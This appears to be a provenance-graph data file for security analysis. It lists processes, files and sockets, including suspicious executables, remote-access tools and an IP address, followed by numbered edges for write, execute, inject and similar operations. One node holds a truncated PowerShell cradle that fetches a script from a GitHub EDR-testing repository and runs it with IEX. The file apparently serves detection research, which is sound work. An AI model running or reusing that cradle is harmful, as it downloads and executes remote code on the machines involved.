21
MP-system_file.exe 
MF-Users\wmpnetwk.exe
TF-C:\Program files\appdata\local\temp\5491.bmp
SF-C:\Windows\explorer.exe
TP*-nsCA5C.tmp
TP*-Payment invoice#05450865.exe 
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-OneDrive.exe 
MF-C:\ProgramData\anydesk
TP-ProcessHacker.exe 
TF-C:\Users\admin\AppData\Local\Temp\207aa4515d\oneetx.exe
MF-\System32\notepad.exe
MP-ytfovlym.exe
MP*-MicrosoftEdgeWebview2Setup.exe
SO-45.63.100.72
MF-C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content
MF-C:\Users\admin\AppData\Roaming\olsptrs\olsptrs
TF-C:\Users\admin\AppData\Local\Temp\is-U1EN3.tmp
MP-regsvr32.exe
MP-MSBuild.exe
TP*-a6302410.exe
43
0 1 WR
0 2 WR
0 3 UK
4 1 WR
4 2 WR
5 2 EX
4 5 IJ
4 6 ST
5 6 ST
7 2 WR
4 7 IJ
5 7 UK
4 8 RD
9 2 UK
4 10 RD
4 11 WR
4 12 IJ
6 12 RF
12 8 WR
12 10 WR
12 11 EX
4 13 IJ
6 13 RF
13 8 WR
13 10 UK
14 12 RF
12 15 EX
12 16 RD
12 17 WR
18 8 WR
18 11 WR
12 18 UK
19 11 WR
14 19 RF
19 15 EX
19 16 WR
19 17 WR
20 11 WR
20 14 ST
20 15 WR
20 16 WR
20 17 WR
19 20 UK

